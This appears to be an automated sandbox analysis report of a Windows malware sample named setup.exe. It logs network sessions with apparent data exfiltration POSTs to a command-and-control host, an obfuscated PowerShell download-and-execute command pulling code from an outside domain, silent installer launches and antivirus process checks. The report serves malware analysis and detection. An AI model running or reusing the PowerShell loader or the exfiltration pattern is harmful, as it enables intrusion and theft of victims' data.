                                                                                                                                                                                                                                2024-12-30 18:10:21 UTC1243OUTData Raw: 2d 2d 48 58 54 45 55 54 42 44 52 37 4d 32 4d 32 54 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 37 32 45 45 44 32 31 46 44 45 34 30 41 35 38 44 38 35 38 35 41 42 34 34 34 38 33 35 36 33 45 39 0d 0a 2d 2d 48 58 54 45 55 54 42 44 52 37 4d 32 4d 32 54 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 48 58 54 45 55 54 42 44 52 37 4d 32 4d 32 54 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 68 52 6a 7a 47 33 2d 2d 44 52 4f 4e 0d 0a 2d 2d 48 58 54
                                                                                                                                                                                                                                Data Ascii: --HXTEUTBDR7M2M2TJContent-Disposition: form-data; name="hwid"72EED21FDE40A58D8585AB44483563E9--HXTEUTBDR7M2M2TJContent-Disposition: form-data; name="pid"1--HXTEUTBDR7M2M2TJContent-Disposition: form-data; name="lid"hRjzG3--DRON--HXT
2024-12-30 18:10:24 UTC | 1139 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                Date: Mon, 30 Dec 2024 18:10:23 GMT
                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                Set-Cookie: PHPSESSID=2ui4lqrv529biuf2ns4iorcoh1; expires=Fri, 25 Apr 2025 11:57:01 GMT; Max-Age=9999999; path=/
                                                                                                                                                                                                                                Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                                                                                Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                                                                                Pragma: no-cache
                                                                                                                                                                                                                                X-Frame-Options: DENY
                                                                                                                                                                                                                                X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                X-XSS-Protection: 1; mode=block
                                                                                                                                                                                                                                cf-cache-status: DYNAMIC
                                                                                                                                                                                                                                vary: accept-encoding
                                                                                                                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=91C%2BoqyNidKsKCVNFntyBidSlR31f4ae2brg0a%2FbLt%2FdXOn5JCmbgOe%2FjqPCDWBT64Qe4NgPGWSc6FQ%2BNc86q0Q%2BRalB0vxN7P78B%2FGc8PwBCJpYA4ZO8GRwGngl4r1FhC3UpA%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                Server: cloudflare
                                                                                                                                                                                                                                CF-RAY: 8fa3fc769e6572b9-EWR
                                                                                                                                                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=1826&min_rtt=1823&rtt_var=689&sent=5&recv=8&lost=0&retrans=0&sent_bytes=2841&recv_bytes=2159&delivery_rate=1580942&cwnd=214&unsent_bytes=0&cid=1690d31ef2dd50f0&ts=2214&x=0"
2024-12-30 18:10:24 UTC | 20 | IN | Data Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
Data Ascii: fok 8.46.123.189
2024-12-30 18:10:24 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
7 | 192.168.2.4 | 49743 | 104.21.32.1 | 443 | 7252 | C:\Users\user\Desktop\setup.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-30 18:10:25 UTC | 284 | OUT | POST /api HTTP/1.1
                                                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                                                Content-Type: multipart/form-data; boundary=7DH7ZQOL75A5IGHY65
                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                                                                                Content-Length: 585356
                                                                                                                                                                                                                                Host: learningypr.click
                                                                                                                                                                                                                                2024-12-30 18:10:25 UTC15331OUTData Raw: 2d 2d 37 44 48 37 5a 51 4f 4c 37 35 41 35 49 47 48 59 36 35 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 37 32 45 45 44 32 31 46 44 45 34 30 41 35 38 44 38 35 38 35 41 42 34 34 34 38 33 35 36 33 45 39 0d 0a 2d 2d 37 44 48 37 5a 51 4f 4c 37 35 41 35 49 47 48 59 36 35 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 37 44 48 37 5a 51 4f 4c 37 35 41 35 49 47 48 59 36 35 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 68 52 6a 7a 47 33 2d 2d 44 52 4f 4e 0d
                                                                                                                                                                                                                                Data Ascii: --7DH7ZQOL75A5IGHY65Content-Disposition: form-data; name="hwid"72EED21FDE40A58D8585AB44483563E9--7DH7ZQOL75A5IGHY65Content-Disposition: form-data; name="pid"1--7DH7ZQOL75A5IGHY65Content-Disposition: form-data; name="lid"hRjzG3--DRON
                                                                                                                                                                                                                                Data Ascii: R(,`0QM?+oz\@'&?B>)VAH;56H'BCLBf|M#ph"n'\K.ByOi5*X2Dr?ru9*X*'"E'M^f>d=/K_KT!+|j5$TNAt!+"'Xt!=~&ZFJ*
                                                                                                                                                                                                                                2024-12-30 18:10:25 UTC15331OUTData Raw: dd 8f 51 df 8a 13 c8 66 08 e6 f3 bf 13 0f 4d 51 f6 c9 20 c8 fd 6e 99 bc b9 6a d7 be 71 2f ee 4b 9f 01 2e 25 a5 74 28 21 a5 b4 d6 92 f9 17 af ed 93 1c af ed 7b f9 b4 42 63 88 8b 35 7d a6 40 10 95 3c 7f ee 23 ef 5d 45 43 48 3b 6f 96 a7 12 ba d2 e5 f5 29 26 21 b8 6f e3 46 af e2 47 d6 a4 43 ef 73 21 2f 5f ad 63 46 4d ef 38 6d 5c 41 ec 0b 09 82 0f 94 fa c5 9d e9 24 21 86 43 00 53 0e 9a 4e df cf 8e e3 78 fa 0a 85 ee 6f b4 64 96 f5 6e a7 97 f8 f6 a0 61 af f5 93 fa 9e e7 4b 7b df 51 e6 ee f6 e8 bb bc ef 59 5c ad f0 7b 6a 3a 57 51 7c 94 62 56 e9 e1 38 af f0 b1 1f 49 86 99 1f 07 2e 4c 34 ed 2f be b9 df c3 df 2b d7 69 a2 fd 73 79 67 78 e5 47 0e 6a 53 0e 53 7c 0d 12 9b df 68 75 ff e0 03 ac ef 60 b2 a9 e9 cd ff ba 8b 8a 44 c0 92 12 bf 6e e8 da ec 17 07 24 47 ef 77 7b
                                                                                                                                                                                                                                Data Ascii: QfMQ njq/K.%t(!{Bc5}@<#]ECH;o)&!oFGCs!/_cFM8m\A$!CSNxodnaK{QY\{j:WQ|bV8I.L4/+isygxGjSS|hu`Dn$Gw{
2024-12-30 18:10:27 UTC | 1139 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                Date: Mon, 30 Dec 2024 18:10:27 GMT
                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                Set-Cookie: PHPSESSID=gq6b9gl2knn8mkmtj5urhu0nfn; expires=Fri, 25 Apr 2025 11:57:06 GMT; Max-Age=9999999; path=/
                                                                                                                                                                                                                                Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                                                                                Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                                                                                Pragma: no-cache
                                                                                                                                                                                                                                X-Frame-Options: DENY
                                                                                                                                                                                                                                X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                X-XSS-Protection: 1; mode=block
                                                                                                                                                                                                                                cf-cache-status: DYNAMIC
                                                                                                                                                                                                                                vary: accept-encoding
                                                                                                                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=QfeAsm6jgRSlfBD9GtIjxoKqjn4sMYtO61kiOAGzn5UDoM6cCu1rc2xA88StcP5RRkSiaqzpb6Q%2BePv%2B7Y6%2FA7MasOeVwMde8skk%2BvuGbk7Ai9ChTQ41mn4BjfFLEP69oeTPyQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                Server: cloudflare
                                                                                                                                                                                                                                CF-RAY: 8fa3fc90097772b9-EWR
                                                                                                                                                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=1820&min_rtt=1817&rtt_var=687&sent=325&recv=601&lost=0&retrans=0&sent_bytes=2841&recv_bytes=587948&delivery_rate=1586094&cwnd=214&unsent_bytes=0&cid=3e77b40f80d4aa2f&ts=1748&x=0"


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
8 | 192.168.2.4 | 49744 | 104.21.32.1 | 443 | 7252 | C:\Users\user\Desktop\setup.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-30 18:10:28 UTC | 266 | OUT | POST /api HTTP/1.1
                                                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                                                                                Content-Length: 113
                                                                                                                                                                                                                                Host: learningypr.click
2024-12-30 18:10:28 UTC | 113 | OUT
                                                                                                                                                                                                                                Data Ascii: act=get_message&ver=4.0&lid=hRjzG3--DRON&j=637b55279021aab33278188cfa638397&hwid=72EED21FDE40A58D8585AB44483563E9
2024-12-30 18:10:29 UTC | 1130 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                Date: Mon, 30 Dec 2024 18:10:29 GMT
                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                Set-Cookie: PHPSESSID=lqd4dar39ii92da606c3o3jfb7; expires=Fri, 25 Apr 2025 11:57:07 GMT; Max-Age=9999999; path=/
                                                                                                                                                                                                                                Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                                                                                Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                                                                                Pragma: no-cache
                                                                                                                                                                                                                                X-Frame-Options: DENY
                                                                                                                                                                                                                                X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                X-XSS-Protection: 1; mode=block
                                                                                                                                                                                                                                cf-cache-status: DYNAMIC
                                                                                                                                                                                                                                vary: accept-encoding
                                                                                                                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=o6X7Yn8Yf8dxSZvLdLsbLPd7cmHR%2BKPB9S0QGL%2FFhoOA5311RYrLnVMIv8nFfJbIbGBJVjyXkbTSslRyy49zPRlXTA5AKfljsai91rAMRhoiZzmZ8IFRvQ%2B4wXn7mosv2cVDsA%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                Server: cloudflare
                                                                                                                                                                                                                                CF-RAY: 8fa3fca1795841a6-EWR
                                                                                                                                                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=1642&min_rtt=1636&rtt_var=618&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2841&recv_bytes=1015&delivery_rate=1784841&cwnd=239&unsent_bytes=0&cid=e30f75e56869ea1c&ts=485&x=0"
2024-12-30 18:10:29 UTC | 218 | IN
                                                                                                                                                                                                                                Data Ascii: d4AmCvhN5FtNsjKl03cxP07mmzaN1ZrqBYFK+UgDT9AZ1ZG43x/H+Ws1deLURJT9uyRtANuiyA0zB738ivDMg2qTBWnbDqc+j0U0JzQwtn1sJL1Rz/Y5yMenGNrrFJ0Xq/d0KVprYxwKtQEAEYLzyfggDDHqg0x9MtfYHn6FuNXbJrDtvbvSnEhFBCPBkHa4DMRZEOqXuUkHQ2yra6BIBc
2024-12-30 18:10:29 UTC | 5 | IN
                                                                                                                                                                                                                                Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
9 | 192.168.2.4 | 49745 | 185.161.251.21 | 443 | 7252 | C:\Users\user\Desktop\setup.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-30 18:10:29 UTC | 201 | OUT | GET /8574262446/ph.txt HTTP/1.1
                                                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                                                                                Host: cegu.shop
2024-12-30 18:10:30 UTC | 249 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                Server: nginx/1.26.2
                                                                                                                                                                                                                                Date: Mon, 30 Dec 2024 18:10:30 GMT
                                                                                                                                                                                                                                Content-Type: text/plain; charset=utf-8
                                                                                                                                                                                                                                Content-Length: 329
                                                                                                                                                                                                                                Last-Modified: Thu, 26 Dec 2024 00:07:06 GMT
                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                ETag: "676c9e2a-149"
                                                                                                                                                                                                                                Accept-Ranges: bytes
2024-12-30 18:10:30 UTC | 329 | IN
                                                                                                                                                                                                                                Data Ascii: [Net.servicepOINTmANaGer]::SEcURiTyPrOtoCOl = [Net.SecUriTyprOtocoltYPe]::tLs12; $gD='https://dfgh.online/invoker.php?compName='+$env:computername; $pTSr = iWr -uRi $gD -uSebASIcpARsiNg -UsErAGent 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/57.


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
10 | 192.168.2.4 | 49746 | 172.67.208.58 | 443 | 7252 | C:\Users\user\Desktop\setup.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-30 18:10:30 UTC | 206 | OUT | GET /int_clp_sha.txt HTTP/1.1
                                                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                                                                                Host: klipvumisui.shop
2024-12-30 18:10:31 UTC | 899 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                Date: Mon, 30 Dec 2024 18:10:30 GMT
                                                                                                                                                                                                                                Content-Type: text/plain
                                                                                                                                                                                                                                Content-Length: 8767044
                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                Accept-Ranges: bytes
                                                                                                                                                                                                                                ETag: "51f99eddd33cc04fb0f55f873b76d907"
                                                                                                                                                                                                                                Last-Modified: Sat, 28 Dec 2024 20:49:42 GMT
                                                                                                                                                                                                                                Vary: Accept-Encoding
                                                                                                                                                                                                                                cf-cache-status: DYNAMIC
                                                                                                                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Xp7c0WXkbMZDSjy9Ndj28QN6tZoAow9O8wNU7%2B7xGIN9ZzTFUqXBv0ZpypEjd8c%2Fej5CyOoxnT2fRIUNxaZE88zLnhbknYoBLJ4QYPRoxetqQFblvDxilEgnpY6XscSFnQGv"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                Server: cloudflare
                                                                                                                                                                                                                                CF-RAY: 8fa3fcae3b610cae-EWR
                                                                                                                                                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=1623&min_rtt=1563&rtt_var=629&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2867&recv_bytes=820&delivery_rate=1868202&cwnd=252&unsent_bytes=0&cid=8b4f34e6a6187cd2&ts=333&x=0"



                                                                                                                                                                                                                                Target ID:0
                                                                                                                                                                                                                                Start time:13:09:55
                                                                                                                                                                                                                                Start date:30/12/2024
                                                                                                                                                                                                                                Path:C:\Users\user\Desktop\setup.exe
                                                                                                                                                                                                                                Wow64 process (32bit):true
                                                                                                                                                                                                                                Commandline:"C:\Users\user\Desktop\setup.exe"
                                                                                                                                                                                                                                Imagebase:0x400000
                                                                                                                                                                                                                                File size:2'097'152 bytes
                                                                                                                                                                                                                                MD5 hash:D781FD542A1DCB91C07C192BCAC16F8E
                                                                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                                                                Programmed in:Borland Delphi
                                                                                                                                                                                                                                Yara matches:
                                                                                                                                                                                                                                • Rule: Windows_Trojan_Donutloader_f40e3759, Description: unknown, Source: 00000000.00000002.2077777234.00000000007B0000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                                                                                Reputation:low
                                                                                                                                                                                                                                Has exited:true

                                                                                                                                                                                                                                Target ID:4
                                                                                                                                                                                                                                Start time:13:10:29
                                                                                                                                                                                                                                Start date:30/12/2024
                                                                                                                                                                                                                                Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                Wow64 process (32bit):true
                                                                                                                                                                                                                                Commandline:powershell -exec bypass [Net.servicepOINTmANaGer]::SEcURiTyPrOtoCOl = [Net.SecUriTyprOtocoltYPe]::tLs12; $gD='https://dfgh.online/invoker.php?compName='+$env:computername; $pTSr = iWr -uRi $gD -uSebASIcpARsiNg -UsErAGent 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/57.36 (KHTML, like Gecko) Chrome/12.0.0.0 Safari/57.36'; IEx $Ptsr.Content; ?
                                                                                                                                                                                                                                Imagebase:0xe0000
                                                                                                                                                                                                                                File size:433'152 bytes
                                                                                                                                                                                                                                MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                                                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                                                Reputation:high
                                                                                                                                                                                                                                Has exited:true

                                                                                                                                                                                                                                Target ID:5
                                                                                                                                                                                                                                Start time:13:10:29
                                                                                                                                                                                                                                Start date:30/12/2024
                                                                                                                                                                                                                                Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                Imagebase:0x7ff7699e0000
                                                                                                                                                                                                                                File size:862'208 bytes
                                                                                                                                                                                                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                                                Reputation:high
                                                                                                                                                                                                                                Has exited:true

                                                                                                                                                                                                                                Target ID:6
                                                                                                                                                                                                                                Start time:13:10:37
                                                                                                                                                                                                                                Start date:30/12/2024
                                                                                                                                                                                                                                Path:C:\Users\user\AppData\Local\Temp\F3638EZUZ711WUU8SDVPW34XAAMUZ.exe
                                                                                                                                                                                                                                Wow64 process (32bit):true
                                                                                                                                                                                                                                Commandline:"C:\Users\user\AppData\Local\Temp\F3638EZUZ711WUU8SDVPW34XAAMUZ.exe"
                                                                                                                                                                                                                                Imagebase:0xf50000
                                                                                                                                                                                                                                File size:8'767'044 bytes
                                                                                                                                                                                                                                MD5 hash:51F99EDDD33CC04FB0F55F873B76D907
                                                                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                                                                Programmed in:Borland Delphi
                                                                                                                                                                                                                                Antivirus matches:
                                                                                                                                                                                                                                • Detection: 39%, ReversingLabs
                                                                                                                                                                                                                                Reputation:low
                                                                                                                                                                                                                                Has exited:true

Target ID:7
Start time:13:10:39
Start date:30/12/2024
Path:C:\Users\user\AppData\Local\Temp\is-87VLI.tmp\F3638EZUZ711WUU8SDVPW34XAAMUZ.tmp
Wow64 process (32bit):true
Commandline:"C:\Users\user\AppData\Local\Temp\is-87VLI.tmp\F3638EZUZ711WUU8SDVPW34XAAMUZ.tmp" /SL5="$902A0,7785838,845824,C:\Users\user\AppData\Local\Temp\F3638EZUZ711WUU8SDVPW34XAAMUZ.exe"
Imagebase:0x1d0000
File size:3'367'424 bytes
MD5 hash:F809F51E678B7F2E388F8C969EF902C8
Has elevated privileges:true
Has administrator privileges:true
Programmed in:Borland Delphi
Antivirus matches:
• Detection: 0%, ReversingLabs
Reputation:low
Has exited:true

Target ID:8
Start time:13:10:40
Start date:30/12/2024
Path:C:\Users\user\AppData\Local\Temp\F3638EZUZ711WUU8SDVPW34XAAMUZ.exe
Wow64 process (32bit):true
Commandline:"C:\Users\user\AppData\Local\Temp\F3638EZUZ711WUU8SDVPW34XAAMUZ.exe" /VERYSILENT
Imagebase:0xf50000
File size:8'767'044 bytes
MD5 hash:51F99EDDD33CC04FB0F55F873B76D907
Has elevated privileges:true
Has administrator privileges:true
Programmed in:Borland Delphi
Reputation:low
Has exited:true

Target ID:9
Start time:13:10:41
Start date:30/12/2024
Path:C:\Users\user\AppData\Local\Temp\is-DJ3IP.tmp\F3638EZUZ711WUU8SDVPW34XAAMUZ.tmp
Wow64 process (32bit):true
Commandline:"C:\Users\user\AppData\Local\Temp\is-DJ3IP.tmp\F3638EZUZ711WUU8SDVPW34XAAMUZ.tmp" /SL5="$90262,7785838,845824,C:\Users\user\AppData\Local\Temp\F3638EZUZ711WUU8SDVPW34XAAMUZ.exe" /VERYSILENT
Imagebase:0xc00000
File size:3'367'424 bytes
MD5 hash:F809F51E678B7F2E388F8C969EF902C8
Has elevated privileges:true
Has administrator privileges:true
Programmed in:Borland Delphi
Antivirus matches:
• Detection: 0%, ReversingLabs
Reputation:low
Has exited:true

Target ID:10
Start time:13:11:11
Start date:30/12/2024
Path:C:\Windows\System32\timeout.exe
Wow64 process (32bit):false
Commandline:"timeout" 9
Imagebase:0x7ff7235d0000
File size:32'768 bytes
MD5 hash:100065E21CFBBDE57CBA2838921F84D6
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Reputation:moderate
Has exited:true

Target ID:11
Start time:13:11:11
Start date:30/12/2024
Path:C:\Windows\System32\conhost.exe
Wow64 process (32bit):false
Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:0x7ff7699e0000
File size:862'208 bytes
MD5 hash:0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Reputation:high
Has exited:true

Target ID:13
Start time:13:11:20
Start date:30/12/2024
Path:C:\Windows\System32\cmd.exe
Wow64 process (32bit):false
Commandline:"cmd.exe" /C tasklist /FI "IMAGENAME eq wrsa.exe" /FO CSV /NH | find /I "wrsa.exe"
Imagebase:0x7ff6880f0000
File size:289'792 bytes
MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Reputation:high
Has exited:true

Target ID:14
Start time:13:11:20
Start date:30/12/2024
Path:C:\Windows\System32\conhost.exe
Wow64 process (32bit):false
Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:0x7ff7699e0000
File size:862'208 bytes
MD5 hash:0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:true

Target ID:15
Start time:13:11:20
Start date:30/12/2024
Path:C:\Windows\System32\tasklist.exe
Wow64 process (32bit):false
Commandline:tasklist /FI "IMAGENAME eq wrsa.exe" /FO CSV /NH
Imagebase:0x7ff649240000
File size:106'496 bytes
MD5 hash:D0A49A170E13D7F6AEBBEFED9DF88AAA
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:true

Target ID:16
Start time:13:11:20
Start date:30/12/2024
Path:C:\Windows\System32\find.exe
Wow64 process (32bit):false
Commandline:find /I "wrsa.exe"
Imagebase:0x7ff6566e0000
File size:17'920 bytes
MD5 hash:4BF76A28D31FC73AA9FC970B22D056AF
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:true

Target ID:17
Start time:13:11:20
Start date:30/12/2024
Path:C:\Windows\System32\cmd.exe
Wow64 process (32bit):false
Commandline:"cmd.exe" /C tasklist /FI "IMAGENAME eq opssvc.exe" /FO CSV /NH | find /I "opssvc.exe"
Imagebase:0x7ff6880f0000
File size:289'792 bytes
MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:true
Has administrator privileges:true
                                                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                                                Has exited:true

                                                                                                                                                                                                                                Target ID:18
                                                                                                                                                                                                                                Start time:13:11:20
                                                                                                                                                                                                                                Start date:30/12/2024
                                                                                                                                                                                                                                Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                Imagebase:0x7ff7699e0000
                                                                                                                                                                                                                                File size:862'208 bytes
                                                                                                                                                                                                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                                                Has exited:true

                                                                                                                                                                                                                                Target ID:19
                                                                                                                                                                                                                                Start time:13:11:20
                                                                                                                                                                                                                                Start date:30/12/2024
                                                                                                                                                                                                                                Path:C:\Windows\System32\tasklist.exe
                                                                                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                                                                                Commandline:tasklist /FI "IMAGENAME eq opssvc.exe" /FO CSV /NH
                                                                                                                                                                                                                                Imagebase:0x7ff649240000
                                                                                                                                                                                                                                File size:106'496 bytes
                                                                                                                                                                                                                                MD5 hash:D0A49A170E13D7F6AEBBEFED9DF88AAA
                                                                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                                                Has exited:true

                                                                                                                                                                                                                                Target ID:20
                                                                                                                                                                                                                                Start time:13:11:20
                                                                                                                                                                                                                                Start date:30/12/2024
                                                                                                                                                                                                                                Path:C:\Windows\System32\find.exe
                                                                                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                                                                                Commandline:find /I "opssvc.exe"
                                                                                                                                                                                                                                Imagebase:0x7ff6566e0000
                                                                                                                                                                                                                                File size:17'920 bytes
                                                                                                                                                                                                                                MD5 hash:4BF76A28D31FC73AA9FC970B22D056AF
                                                                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                                                Has exited:true

                                                                                                                                                                                                                                Target ID:21
                                                                                                                                                                                                                                Start time:13:11:20
                                                                                                                                                                                                                                Start date:30/12/2024
                                                                                                                                                                                                                                Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                                                                                Commandline:"cmd.exe" /C tasklist /FI "IMAGENAME eq avastui.exe" /FO CSV /NH | find /I "avastui.exe"
                                                                                                                                                                                                                                Imagebase:0x7ff6880f0000
                                                                                                                                                                                                                                File size:289'792 bytes
                                                                                                                                                                                                                                MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                                                Has exited:true

                                                                                                                                                                                                                                Target ID:22
                                                                                                                                                                                                                                Start time:13:11:20
                                                                                                                                                                                                                                Start date:30/12/2024
                                                                                                                                                                                                                                Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                Wow64 process (32bit):false
